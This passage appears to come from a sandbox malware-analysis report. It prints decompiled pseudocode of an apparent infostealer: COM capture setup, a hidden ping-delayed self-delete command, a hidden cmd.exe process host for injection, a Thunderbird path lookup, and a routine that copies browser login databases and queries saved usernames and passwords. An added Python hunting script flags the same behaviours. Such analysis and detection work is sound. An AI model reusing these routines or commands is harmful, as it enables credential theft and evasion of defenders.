                                  						_t63 =  *((intOrPtr*)( *_t93 + 8))(_t93);
                                  						_v16 = _v16 & 0x00000000;
                                  					}
                                  					_t94 = _v20;
                                  					if(_t94 != 0) {
                                  						_t63 =  *((intOrPtr*)( *_t94 + 8))(_t94);
                                  						_v20 = _v20 & 0x00000000;
                                  					}
                                  					_t56 =  &_v24; // 0x414222
                                  					_t95 =  *_t56;
                                  					if(_t95 != 0) {
                                  						_t63 =  *((intOrPtr*)( *_t95 + 8))(_t95);
                                  						_v24 = _v24 & 0x00000000;
                                  					}
                                  					if(_t118 != 0) {
                                  						_t63 =  *((intOrPtr*)( *_t118 + 8))(_t118);
                                  					}
                                  					if(_t89 != 0) {
                                  						_t63 =  *((intOrPtr*)( *_t89 + 8))(_t89);
                                  					}
                                  					__imp__CoUninitialize();
                                  					return _t63;
                                  				}
                                  				_t63 =  *((intOrPtr*)( *_t91))(_t91, 0x4175a0,  &_v16);   /* QueryInterface(IID at 0x4175a0) -> _v16 */
                                  				_t96 = _v16;
                                  				if(_t96 == 0) {
                                  					goto L8;
                                  				}
                                  				 *((intOrPtr*)( *_t96 + 4))(_t96);   /* AddRef */
                                  				_t63 = E00414A12(_a4,  &_v12);   /* subcall: CoCreateInstance(CLSID at 0x417600, IID at 0x41a77c) -> _v12 */
                                  				if(_v12 == 0) {
                                  					goto L10;
                                  				}
                                  				_t63 =  *_t115(0x417610, 0, 1, 0x41a78c,  &_v20);   /* third object -> _v20 */
                                  				_t98 = _v20;
                                  				if(_t98 != 0) {
                                  					 *((intOrPtr*)( *_t98 + 0xc))(_t98, _v12, L"Source");   /* slot 0xc is called once per object with a name: filter registration */
                                  					_t76 = _v20;
                                  					 *((intOrPtr*)( *_t76 + 0xc))(_t76, _v16, L"Grabber");
                                  					E00401052( &_v144, 0, 0x48);   /* memset-like (from its use here): zero a 0x48-byte struct */
                                  					_t22 =  &_v24; // 0x414222
                                  					_t80 =  *_t22;
                                  					asm("movsd");   /* eight movsd: 32 bytes copied into the struct from a source the decompiler does not show */
                                  					asm("movsd");
                                  					asm("movsd");
                                  					asm("movsd");
                                  					asm("movsd");
                                  					asm("movsd");
                                  					asm("movsd");
                                  					asm("movsd");
                                  					 *((intOrPtr*)( *_t80 + 0x10))(_t80,  &_v144);   /* slot 0x10 on the first object receives the struct */
                                  					_t63 = E0041462F();
                                  					_t118 = _t63;
                                  					if(_t118 != 0) {
                                  						_t63 = E0041464B();
                                  						_t89 = _t63;
                                  						if(_t89 != 0) {
                                  							_t103 = _v20;
                                  							_t63 =  *((intOrPtr*)( *_t103 + 0x2c))(_t103, _t118, _t89);   /* slot 0x2c with the two objects from E0041462F/E0041464B; HRESULT checked below */
                                  							if(_t63 >= 0) {
                                  								_t31 =  &_v24; // 0x414222
                                  								_t82 =  *_t31;
                                  								 *((intOrPtr*)( *_t82 + 0x14))(_t82,  &_v216);   /* slot 0x14 fills _v216 */
                                  								_t105 = _v148;
                                  								_t113 = _v148 + 0x30;
                                  								/* memcpy-like, 0x28 bytes; the destination arithmetic reduces to _t121 - 0x44 (the decompiler's frame pointer),
                                  								   i.e. the _v68.._v28 locals that E00414AD1 reads just below */
                                  								E0040102C(_t121 + _v148 + 0x30 - _t105 - 0x74, _v148 + 0x30, 0x28);
                                  								E00414492( &_v216);   /* subcall: CoTaskMemFree on the returned buffer (see APIs) */
                                  								_t63 = E00414AD1(_v28, _t113, _a4, _v64, _v68, _v58);
                                  							}
                                  						}
                                  					}
                                  				}
                                  				goto L8;
                                  			}


                                  Per-statement addresses for the C-code above, one per statement in order (the instruction text column is not present in this extraction):
                                  0x004146ef
                                  0x004146f3
                                  0x004146f9
                                  0x004146fc
                                  0x00414708
                                  0x0041470b
                                  0x0041470d
                                  0x00414710
                                  0x00414712
                                  0x00414715
                                  0x00414720
                                  0x00414722
                                  0x00414722
                                  0x00414727
                                  0x00414851
                                  0x00414851
                                  0x00414856
                                  0x0041485b
                                  0x0041485e
                                  0x0041485e
                                  0x00414862
                                  0x00414862
                                  0x00414867
                                  0x0041486c
                                  0x0041486f
                                  0x0041486f
                                  0x00414873
                                  0x00414878
                                  0x0041487d
                                  0x00414880
                                  0x00414880
                                  0x00414884
                                  0x00414884
                                  0x00414889
                                  0x0041488e
                                  0x00414891
                                  0x00414891
                                  0x00414897
                                  0x0041489c
                                  0x0041489c
                                  0x004148a1
                                  0x004148a6
                                  0x004148a6
                                  0x004148a9
                                  0x004148b3
                                  0x004148b3
                                  0x00414739
                                  0x0041473b
                                  0x00414740
                                  0x00000000
                                  0x00000000
                                  0x00414749
                                  0x00414752
                                  0x0041475a
                                  0x00000000
                                  0x00000000
                                  0x00414771
                                  0x00414773
                                  0x00414778
                                  0x00414789
                                  0x0041478c
                                  0x0041479a
                                  0x004147a7
                                  0x004147b1
                                  0x004147b1
                                  0x004147c3
                                  0x004147c6
                                  0x004147c7
                                  0x004147c8
                                  0x004147d1
                                  0x004147d2
                                  0x004147d3
                                  0x004147d4
                                  0x004147d7
                                  0x004147dd
                                  0x004147e2
                                  0x004147e6
                                  0x004147eb
                                  0x004147f0
                                  0x004147f4
                                  0x004147f6
                                  0x004147fe
                                  0x00414803
                                  0x00414805
                                  0x00414805
                                  0x00414812
                                  0x00414815
                                  0x0041481d
                                  0x0041482a
                                  0x00414838
                                  0x0041484c
                                  0x0041484c
                                  0x00414803
                                  0x004147f4
                                  0x004147e6
                                  0x00000000

                                  APIs
                                  • CoInitialize.OLE32(00000000), ref: 004146F3
                                  • CoCreateInstance.OLE32(004175C0,00000000,00000001,0041A79C,"BA), ref: 00414720
                                  • CoUninitialize.OLE32 ref: 004148A9
                                    • Part of subcall function 00414A12: CoCreateInstance.OLE32(00417600,00000000,00000001,0041A77C,?), ref: 00414A40
                                  • CoCreateInstance.OLE32(00417610,00000000,00000001,0041A78C,?), ref: 00414771
                                    • Part of subcall function 00414492: CoTaskMemFree.OLE32(?), ref: 004144A0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: CreateInstance$FreeInitializeTaskUninitialize
                                  • String ID: "BA$Grabber$Source$vids
                                  • API String ID: 533512943-1720631296
                                  • Opcode ID: 9e10a3957bbf15e7499bf9a219475944645554586d18aeaed1ebcb477bdb49d5
                                  • Instruction ID: 2c6567443aae3fa2ccd83cd9410249409bd9c9e0b512ace47bdcaa6ee1176714
                                  • Opcode Fuzzy Hash: 9e10a3957bbf15e7499bf9a219475944645554586d18aeaed1ebcb477bdb49d5
                                  • Instruction Fuzzy Hash: D7517F75A00209AFDB14EFA5C888EEEB7B9FF84305F14846EF915AB250C7759D40CB54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 79%
                                  			/* Self-removal routine. Per the report's API list the E004124D7 subcall issues
                                  			   RegDeleteKeyW(HKEY_CURRENT_USER, ...), so the function first removes a registry
                                  			   artefact, kills a worker thread, optionally touches a value named "Load" (string from
                                  			   the report; which key is opened is not visible here), then spawns a hidden cmd.exe
                                  			   that waits about a second and deletes the running executable once ExitProcess has
                                  			   released the file lock. */
                                  			E00402A9C() {
                                  				char _v8;
                                  				struct _PROCESS_INFORMATION _v24;
                                  				struct _STARTUPINFOA _v92;
                                  				char _v352;
                                  				char _v816;
                                  				char _v817;
                                  				char _v872;
                                  				void* _t59;
                                  				void* _t66;
                                  				void* _t69;
                                  
                                  				_t59 = _t66;
                                  				_t69 = _t59;
                                  				E004124D7(_t69 + 0x10);   /* subcall: RegDeleteKeyW(HKEY_CURRENT_USER, ?) */
                                  				if( *((intOrPtr*)(_t69 + 0x68)) != 0) {
                                  					TerminateThread( *0x559cb4, 0);   /* global thread handle */
                                  				}
                                  				if( *((intOrPtr*)(_t69 + 0x50)) != 0) {
                                  					E00412612(_t69 + 4,  *((intOrPtr*)(_t69 + 8)), _t69 + 0x14, 0x20006, 0);   /* 0x20006 == KEY_WRITE */
                                  					E004124F2(_t69 + 4, E004036F7( &_v8, L"Load"));   /* value name "Load" (see Strings) */
                                  					E00405FEB(_v8);
                                  					E00412554(_t69 + 4);
                                  				}
                                  				E00401052( &_v92, 0, 0x44);   /* memset-like (from its use here): zero STARTUPINFOA, 0x44 bytes */
                                  				asm("stosd");   /* four stosd: zero the 16-byte PROCESS_INFORMATION */
                                  				asm("stosd");
                                  				asm("stosd");
                                  				asm("stosd");
                                  				GetModuleFileNameA(0,  &_v352, 0x104);   /* own image path */
                                  				E0040102C( &_v872, "cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q ", 0x37);   /* memcpy-like; 0x37 is the literal's length */
                                  				E0040102C( &_v817, "\"", 1);   /* _v872 + 0x37: opening quote */
                                  				E0040102C( &_v816,  &_v352, E00401133( &_v352));   /* _v872 + 0x38: own path (E00401133 is strlen-like) */
                                  				E0040102C(E00401133( &_v352) + 0x38 +  &_v872, "\"", 2);   /* closing quote plus terminating NUL */
                                  				CreateProcessA(0,  &_v872, 0, 0, 0, 0x8000000, 0, 0,  &_v92,  &_v24);   /* 0x08000000 == CREATE_NO_WINDOW */
                                  				CloseHandle(_v24.hThread);
                                  				CloseHandle(_v24);   /* first member of PROCESS_INFORMATION, i.e. hProcess */
                                  				ExitProcess(0);   /* the deleting cmd.exe outlives this process */
                                  			}

                                  Per-statement addresses for the C-code above, one per statement in order (the instruction text column is not present in this extraction):
                                  0x00402a9c
                                  0x00412d01
                                  0x00412d06
                                  0x00412d10
                                  0x00412d19
                                  0x00412d19
                                  0x00412d22
                                  0x00412d36
                                  0x00412d4b
                                  0x00412d53
                                  0x00412d5a
                                  0x00412d5a
                                  0x00412d66
                                  0x00412d70
                                  0x00412d74
                                  0x00412d7a
                                  0x00412d7b
                                  0x00412d84
                                  0x00412d98
                                  0x00412dac
                                  0x00412dcc
                                  0x00412dec
                                  0x00412e0e
                                  0x00412e1d
                                  0x00412e22
                                  0x00412e25

                                  APIs
                                    • Part of subcall function 004124D7: RegDeleteKeyW.ADVAPI32(80000001,?), ref: 004124DE
                                  • TerminateThread.KERNEL32(00000000,?,?), ref: 00412D19
                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?), ref: 00412D84
                                  • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 00412E0E
                                  • CloseHandle.KERNEL32(?), ref: 00412E1D
                                  • CloseHandle.KERNEL32(?), ref: 00412E22
                                  • ExitProcess.KERNEL32 ref: 00412E25
                                  Strings
                                  • cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q , xrefs: 00412D92
                                  • Load, xrefs: 00412D3B
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: CloseHandleProcess$CreateDeleteExitFileModuleNameTerminateThread
                                  • String ID: Load$cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q
                                  • API String ID: 3630425516-2018186591
                                  • Opcode ID: 723ffad1e99c6304dd55bc25b5baac8dfa4d878023762704fa3abc36bfc35486
                                  • Instruction ID: 037c922c3f030f8a7e2167b9092222fb162bc460f9f39b1e2300c97669b415f7
                                  • Opcode Fuzzy Hash: 723ffad1e99c6304dd55bc25b5baac8dfa4d878023762704fa3abc36bfc35486
                                  • Instruction Fuzzy Hash: 623167B1900619BFDB11EBA1CD86EEF777DFF04304F004476B205A6191DB78AE948BA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 68%
                                  			/* Picks a host process. IsWow64Process on the current process tells the 32-bit sample
                                  			   whether it runs on 64-bit Windows. On a native 32-bit OS it takes E0041405F's result
                                  			   as the target PID; under WOW64 it starts a hidden, argument-less cmd.exe and uses that
                                  			   PID. Either way the PID goes to E00413F7F, whose body is not part of this section. */
                                  			E00413EBA() {
                                  				void* _v8;
                                  				struct _PROCESS_INFORMATION _v24;
                                  				struct _STARTUPINFOA _v100;
                                  				int _t10;
                                  				void* _t23;
                                  				int _t24;
                                  				CHAR* _t26;
                                  
                                  				_v8 = 0;
                                  				_t10 = GetCurrentProcess();
                                  				__imp__IsWow64Process(_t10,  &_v8);
                                  				if(_t10 != 0) {   /* as decompiled this tests the pseudo-handle; the original most likely tests IsWow64Process's return value (assumption) */
                                  					if(_v8 == 0) {   /* not WOW64: native 32-bit Windows */
                                  						_t10 = E0041405F(_t23, __eflags);
                                  						__eflags = _t10;
                                  						if(_t10 != 0) {
                                  							_t24 = _t10;
                                  							goto L6;
                                  						}
                                  					} else {   /* WOW64: 32-bit sample on 64-bit Windows */
                                  						_t26 = VirtualAlloc(0, 0xff, 0x1000, 0x40);   /* MEM_COMMIT, PAGE_EXECUTE_READWRITE; 0xff bytes asked for, page granularity makes the 0x104-byte write below fit */
                                  						GetWindowsDirectoryA(_t26, 0x104);
                                  						E0040102C( &(_t26[lstrlenA(_t26)]), "\\System32\\cmd.exe", 0x14);   /* memcpy-like; 0x14 bytes, more than the 17-char literal plus NUL */
                                  						/* From a 32-bit process under WOW64 the file system redirects System32\cmd.exe to
                                  						   SysWOW64\cmd.exe, so the host is 32-bit, matching a 32-bit injected image. */
                                  						E00401052( &_v100, 0, 0x44);   /* memset-like: zero STARTUPINFOA */
                                  						asm("stosd");   /* four stosd: zero PROCESS_INFORMATION */
                                  						asm("stosd");
                                  						asm("stosd");
                                  						asm("stosd");
                                  						_t10 = CreateProcessA(_t26, 0, 0, 0, 0, 0x8000000, 0, 0,  &_v100,  &_v24);   /* lpCommandLine NULL, CREATE_NO_WINDOW */
                                  						if(_t10 != 0) {
                                  							Sleep(0x3e8);   /* 1 s for the host to initialise */
                                  							_t24 = _v24.dwProcessId;
                                  							L6:
                                  							return E00413F7F(_t24);   /* PID handed to the next stage */
                                  						}
                                  					}
                                  				}
                                  				return _t10;
                                  			}

                                  Per-statement addresses for the C-code above, one per statement in order (the instruction text column is not present in this extraction):
                                  0x00413ec9
                                  0x00413ecc
                                  0x00413ed3
                                  0x00413edb
                                  0x00413ee4
                                  0x00413f6a
                                  0x00413f6f
                                  0x00413f71
                                  0x00413f73
                                  0x00000000
                                  0x00413f73
                                  0x00413eea
                                  0x00413efd
                                  0x00413f05
                                  0x00413f1c
                                  0x00413f2b
                                  0x00413f35
                                  0x00413f39
                                  0x00413f3a
                                  0x00413f3b
                                  0x00413f50
                                  0x00413f58
                                  0x00413f5f
                                  0x00413f65
                                  0x00413f75
                                  0x00000000
                                  0x00413f75
                                  0x00413f58
                                  0x00413ee4
                                  0x00413f7e

                                  APIs
                                  • GetCurrentProcess.KERNEL32(?,00000000,74A313FB,00000000), ref: 00413ECC
                                  • IsWow64Process.KERNEL32(00000000), ref: 00413ED3
                                  • VirtualAlloc.KERNEL32(00000000,000000FF,00001000,00000040), ref: 00413EF7
                                  • GetWindowsDirectoryA.KERNEL32(00000000,00000104), ref: 00413F05
                                  • lstrlenA.KERNEL32(00000000,\System32\cmd.exe,00000014), ref: 00413F13
                                  • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 00413F50
                                  • Sleep.KERNEL32(000003E8), ref: 00413F5F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Process$AllocCreateCurrentDirectorySleepVirtualWindowsWow64lstrlen
                                  • String ID: \System32\cmd.exe
                                  • API String ID: 3151064845-2003734499
                                  • Opcode ID: ed219067b45a991398468e4a26b8bc153abac1b375d46e51515a851acaccb22f
                                  • Instruction ID: afe1c3a2dd0aca87645a04bed0ab53e4b63e38e155d51139ff1440feea8eaa1f
                                  • Opcode Fuzzy Hash: ed219067b45a991398468e4a26b8bc153abac1b375d46e51515a851acaccb22f
                                  • Instruction Fuzzy Hash: 6D1181B1A04309BFFB109BB59C49FEF767CEB08785F004036F605E6290DA789E458669
                                  Uniqueness

                                  Uniqueness Score: -1.00%
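Added example, not code from the sample, from the report or from the sandbox vendor: hunting logic in Python over constructed Sysmon Event ID 1 style records that flags the two process-creation behaviours decompiled in E00402A9C and E00413EBA above. Rule one matches the ping-delayed self-delete command line and reports it only when the Del target is the parent's own image; rule two flags an argument-less cmd.exe started by a parent that is not an interactive shell, and notes when Image and CommandLine disagree because a 32-bit caller under WOW64 asked for System32\cmd.exe. The record field names (pid, ppid, image, cmdline, parent_image), the dropped-file path svchost32.exe and every event value are constructed for this example; the WOW64 check relies on the documented CreateProcess behaviour that a NULL lpCommandLine makes lpApplicationName the new process's command line.

```python
"""Hunting rules for ping-delayed self-deletion and argument-less cmd.exe hosts.

Added example for this page; not code from the analysed sample or the report.
All events below are constructed Sysmon Event ID 1 style records.
"""
import re
from typing import Optional

# cmd.exe /C ping <ip> -n <count> -w <ms> > Nul & Del /f /q "<path>"
# The ping is only a delay so that the deleting cmd.exe runs after the
# calling process has exited and its image file is no longer locked.
SELF_DELETE_RE = re.compile(
    r'ping\s+\S+\s+(?:-[nw]\s+\d+\s+)+>\s*nul\s*&\s*del\s+(?:/[fqa]\s+)*'
    r'"?(?P<target>[^"]+?)"?\s*$',
    re.IGNORECASE,
)

# Parents from which an argument-less cmd.exe is ordinary interactive use.
INTERACTIVE_PARENTS = {"explorer.exe", "cmd.exe", "powershell.exe", "pwsh.exe",
                       "windowsterminal.exe"}

# Constructed events (svchost32.exe is a made-up dropped-file name, not from the report).
SAMPLE_EVENTS = [
    {"pid": 4412, "ppid": 2210,
     "image": r"C:\Users\user\AppData\Roaming\svchost32.exe",
     "cmdline": r'"C:\Users\user\AppData\Roaming\svchost32.exe"',
     "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"},
    # Host spawned as in E00413EBA: lpApplicationName only, redirected to SysWOW64.
    {"pid": 4500, "ppid": 4412,
     "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": r"C:\Windows\System32\cmd.exe",
     "parent_image": r"C:\Users\user\AppData\Roaming\svchost32.exe"},
    # Self-delete as in E00402A9C.
    {"pid": 4620, "ppid": 4412,
     "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": r'cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q "C:\Users\user\AppData\Roaming\svchost32.exe"',
     "parent_image": r"C:\Users\user\AppData\Roaming\svchost32.exe"},
    # Benign noise: a user-driven cmd.exe with arguments and one without.
    {"pid": 5000, "ppid": 3300,
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'"C:\Windows\System32\cmd.exe" /c dir',
     "parent_image": r"C:\Windows\explorer.exe"},
    {"pid": 5100, "ppid": 3300,
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"C:\Windows\System32\cmd.exe",
     "parent_image": r"C:\Windows\explorer.exe"},
]


def parse_self_delete(cmdline: str) -> Optional[str]:
    """Return the path deleted by a ping-delayed self-delete command line, else None."""
    m = SELF_DELETE_RE.search(cmdline)
    return m.group("target") if m else None


def split_command_line(cmdline: str):
    """Split a Win32 command line into (application, remaining arguments)."""
    cmdline = cmdline.strip()
    if cmdline.startswith('"'):
        end = cmdline.find('"', 1)
        if end == -1:
            return cmdline[1:], ""
        return cmdline[1:end], cmdline[end + 1:].strip()
    app, _, rest = cmdline.partition(" ")
    return app, rest.strip()


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def hunt(events):
    """Apply both rules to a list of events and return the findings in event order."""
    findings = []
    for ev in events:
        target = parse_self_delete(ev["cmdline"])
        if target is not None and target.lower() == ev["parent_image"].lower():
            findings.append({"rule": "self_delete", "pid": ev["pid"],
                             "parent_pid": ev["ppid"], "deleted": target})
        app, args = split_command_line(ev["cmdline"])
        if (basename(ev["image"]) == "cmd.exe" and args == ""
                and basename(ev["parent_image"]) not in INTERACTIVE_PARENTS):
            # A NULL lpCommandLine makes lpApplicationName the logged command line.
            # A 32-bit caller under WOW64 names System32\cmd.exe but the file system
            # starts SysWOW64\cmd.exe, so Image and CommandLine disagree.
            redirected = ("\\syswow64\\" in ev["image"].lower()
                          and "\\system32\\" in app.lower())
            findings.append({"rule": "argless_cmd_host", "pid": ev["pid"],
                             "parent_pid": ev["ppid"], "wow64_redirected": redirected})
    return findings


if __name__ == "__main__":
    for finding in hunt(SAMPLE_EVENTS):
        print(finding)
```

The self-delete rule deliberately requires the deleted path to equal the parent's image: the ping-then-del idiom also appears in legitimate installers, and the match on the parent's own file is what makes it a self-removal. The `wow64_redirected` flag is worth keeping in the alert because it tells the responder that the host, and therefore the injected payload, is 32-bit before any memory dump is taken.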

                                  C-Code - Quality: 100%
                                  			/* Resolves an installed application's directory through
                                  			   HKLM\Software\Microsoft\Windows\CurrentVersion\App Paths\<exe>\Path.
                                  			   __ecx is the executable name (the report's xref shows L"thunderbird.exe" as the
                                  			   argument at the lstrcatW call), __edx the caller's output buffer. */
                                  			E0040B87D(WCHAR* __ecx, char* __edx, void* __eflags) {
                                  				void* _v8;
                                  				int _v12;
                                  				int _v16;
                                  				short _v536;
                                  				char* _t32;
                                  				WCHAR* _t33;
                                  
                                  				_v12 = 0x104;   /* cbData limit for the output buffer, in bytes */
                                  				_v16 = 1;   /* receives the value type; initialised to REG_SZ */
                                  				_t32 = __edx;
                                  				_t33 = __ecx;
                                  				E00401052( &_v536, 0, 0x104);   /* memset-like (from its use here); zeroes only the first 0x104 of the 0x208-byte buffer */
                                  				lstrcpyW( &_v536, L"Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\");
                                  				lstrcatW( &_v536, _t33);
                                  				if(RegOpenKeyExW(0x80000002,  &_v536, 0, 1,  &_v8) != 0) {   /* HKEY_LOCAL_MACHINE, KEY_QUERY_VALUE */
                                  					return 0;
                                  				}
                                  				RegQueryValueExW(_v8, L"Path", 0,  &_v16, _t32,  &_v12);   /* return value ignored: on failure the caller's buffer is left as it was */
                                  				RegCloseKey(_v8);
                                  				return 1;   /* success is reported whenever the key exists, not only when "Path" was read */
                                  			}

                                  Per-statement addresses for the C-code above, one per statement in order (the instruction text column is not present in this extraction):
                                  0x0040b891
                                  0x0040b89b
                                  0x0040b8a1
                                  0x0040b8a3
                                  0x0040b8a5
                                  0x0040b8b9
                                  0x0040b8c7
                                  0x0040b8e8
                                  0x00000000
                                  0x0040b910
                                  0x0040b8fd
                                  0x0040b906
                                  0x00000000

                                  APIs
                                  • lstrcpyW.KERNEL32(?,Software\Microsoft\Windows\CurrentVersion\App Paths\), ref: 0040B8B9
                                  • lstrcatW.KERNEL32 ref: 0040B8C7
                                  • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00409E8E,?,00000104,00000000), ref: 0040B8E0
                                  • RegQueryValueExW.ADVAPI32(00409E8E,Path,00000000,?,?,?,?,00000104,00000000), ref: 0040B8FD
                                  • RegCloseKey.ADVAPI32(00409E8E,?,00000104,00000000), ref: 0040B906
                                  Strings
                                  • thunderbird.exe, xrefs: 0040B8BF
                                  • Software\Microsoft\Windows\CurrentVersion\App Paths\, xrefs: 0040B8B3
                                  • Path, xrefs: 0040B8F5
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: CloseOpenQueryValuelstrcatlstrcpy
                                  • String ID: Path$Software\Microsoft\Windows\CurrentVersion\App Paths\$thunderbird.exe
                                  • API String ID: 3135247354-1374996286
                                  • Opcode ID: 145a1f37adbbfc8c3e5f119a952875368c6e1147b4b001a2de5ceb485c9eb7eb
                                  • Instruction ID: 3df0df8215fcb83d59d950a1b29e9a277ea2ca522fea2b5b845973b94dc247ed
                                  • Opcode Fuzzy Hash: 145a1f37adbbfc8c3e5f119a952875368c6e1147b4b001a2de5ceb485c9eb7eb
                                  • Instruction Fuzzy Hash: 7D111EB2A4020CBFDB10EBA5DD49FDA7BBCEB54344F1044B6B605E2190E6749F448BA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 92%
                                  			E0040BC0D(intOrPtr __ecx, void* __eflags, char _a4, signed int _a8, char _a12, char _a16, intOrPtr _a20) {
                                  				WCHAR* _v12;
                                  				char _v16;
                                  				WCHAR* _v20;
                                  				signed int _v24;
                                  				signed int _v28;
                                  				signed int _v32;
                                  				char _v36;
                                  				char _v40;
                                  				char _v44;
                                  				char _v48;
                                  				intOrPtr _v52;
                                  				char _v56;
                                  				char _v60;
                                  				char _v64;
                                  				char _v68;
                                  				char _v72;
                                  				intOrPtr _v76;
                                  				char _v80;
                                  				char _v84;
                                  				char _v88;
                                  				int _t148;
                                  				intOrPtr* _t160;
                                  				void* _t161;
                                  				char _t165;
                                  				char _t177;
                                  				char _t178;
                                  				char _t188;
                                  				char* _t189;
                                  				char* _t190;
                                  				char* _t191;
                                  				void* _t192;
                                  				void* _t194;
                                  				char _t198;
                                  				char _t223;
                                  				intOrPtr _t233;
                                  				char* _t251;
                                  				char* _t255;
                                  				void* _t322;
                                  				void* _t323;
                                  				void* _t324;
                                  				void* _t325;
                                  				void* _t326;
                                  				void* _t327;
                                  				char _t331;
                                  				WCHAR* _t337;
                                  				intOrPtr _t338;
                                  				void* _t339;
                                  				void* _t340;
                                  
                                  				_t343 = __eflags;
                                  				_v24 = _v24 & 0x00000000;
                                  				_v28 = _v28 & 0x00000000;
                                  				_t233 = __ecx;
                                  				_t322 = 0x1a;
                                  				_v52 = __ecx;
                                  				E00410C8A( &_v12, _t322, __eflags);
                                  				_t329 = "\\";
                                  				E0040357C( &_v12, _t322, __eflags, "\\");
                                  				_t323 = 8;
                                  				E00403447( &_v12, _t343, E004035B9( &_v48, _t323, _t343));
                                  				E00405FEB(_v48);
                                  				_t336 = L".tmp";
                                  				E0040357C( &_v12, _t323, _t343, L".tmp");
                                  				_t324 = 0x1a;
                                  				E00410C8A( &_v20, _t324, _t343);
                                  				E0040357C( &_v20, _t324, _t343, _t329);
                                  				_t325 = 8;
                                  				E00403447( &_v20, _t343, E004035B9( &_v48, _t325, _t343));
                                  				E00405FEB(_v48);
                                  				E0040357C( &_v20, _t325, _t343, _t336);
                                  				_t344 = _a12;
                                  				_t251 =  &_v48;
                                  				if(_a12 == 0) {
                                  					_push(0x1c);
                                  				} else {
                                  					_push(0x1a);
                                  				}
                                  				_pop(_t326);
                                  				E00403549( &_v24, E00410C8A(_t251, _t326, _t344));
                                  				E00405FEB(_v48);
                                  				E0040357C( &_v24, _t326, _t344, _a4);
                                  				_t345 = _a12;
                                  				_t255 =  &_a12;
                                  				if(_a12 == 0) {
                                  					_push(0x1c);
                                  				} else {
                                  					_push(0x1a);
                                  				}
                                  				_pop(_t327);
                                  				E00403549( &_v28, E00410C8A(_t255, _t327, _t345));
                                  				E00405FEB(_a12);
                                  				E0040357C( &_v28, _t327, _t345, _a8);
                                  				_t148 = PathFileExistsW(_v24);
                                  				_t337 = _v28;
                                  				if(_t148 == 0 || PathFileExistsW(_t337) == 0 || CopyFileW(_v24, _v12, 0) == 0 || CopyFileW(_t337, _v20, 0) == 0) {
                                  					L12:
                                  					_t331 = 0;
                                  					goto L13;
                                  				} else {
                                  					E00403549( &_v24,  &_v12);
                                  					_t160 = E00403666( &_v24,  &_a12);
                                  					_t161 =  *((intOrPtr*)(_t233 + 0x30))( *_t160,  &_v56);
                                  					_t268 = _a12;
                                  					E00405FEB(_a12);
                                  					if(_t161 == 0) {
                                  						_v32 = _v32 & 0x00000000;
                                  						_a8 = _a8 & 0x00000000;
                                  						_t165 = E0040C63E(_t268, _t268,  &_v32,  &_a8);
                                  						_t340 = _t339 + 0x10;
                                  						_t331 = 1;
                                  						__eflags = _t165;
                                  						if(_t165 == 0) {
                                  							L36:
                                  							 *((intOrPtr*)(_t233 + 0x60))();
                                  							 *((intOrPtr*)(_t233 + 0x34))();
                                  							E0040373F(_t340,  &_v12);
                                  							E0041142A(_v56);
                                  							E0040373F(_t340,  &_v20);
                                  							E0041142A(_v16);
                                  							L13:
                                  							E00405FEB(_v20);
                                  							E00405FEB(_v12);
                                  							E00405FEB(_t337);
                                  							E00405FEB(_v24);
                                  							return _t331;
                                  						}
                                  						__eflags = _a16;
                                  						_t176 =  !=  ? "select signon_realm, origin_url, username_value, password_value from wow_logins" : "select signon_realm, origin_url, username_value, password_value from logins";
                                  						_t177 =  *((intOrPtr*)(_t233 + 0x38))(_v56,  !=  ? "select signon_realm, origin_url, username_value, password_value from wow_logins" : "select signon_realm, origin_url, username_value, password_value from logins", 0xffffffff,  &_v16, 0);
                                  						_t340 = _t340 + 0x14;
                                  						__eflags = _t177;
                                  						if(_t177 != 0) {
                                  							goto L36;
                                  						}
                                  						_t178 =  *((intOrPtr*)(_t233 + 0x44))(_v16);
                                  						_pop(_t268);
                                  						__eflags = _t178 - 0x64;
                                  						if(_t178 != 0x64) {
                                  							L35:
                                  							__eflags = _t178;
                                  							if(_t178 != 0) {
                                  								goto L11;
                                  							}
                                  							goto L36;
                                  						}
                                  						_t338 = _t233;
                                  						do {
                                  							_a16 = E00405F68(_t331);
                                  							_t335 = E00405F68(_t331);
                                  							_a4 = _t186;
                                  							_v48 = E00405F68(1);
                                  							_t188 = E00405F68(1);
                                  							_a12 = _t188;
                                  							_t189 =  *((intOrPtr*)(_t338 + 0x40))(_v16, 0);
                                  							__eflags =  *_t189;
                                  							if( *_t189 != 0) {
                                  								E00403237( &_a4, E004034D1( &_v60, _t189));
                                  								E00405FEB(_v60);
                                  								_t335 = _a4;
                                  							}
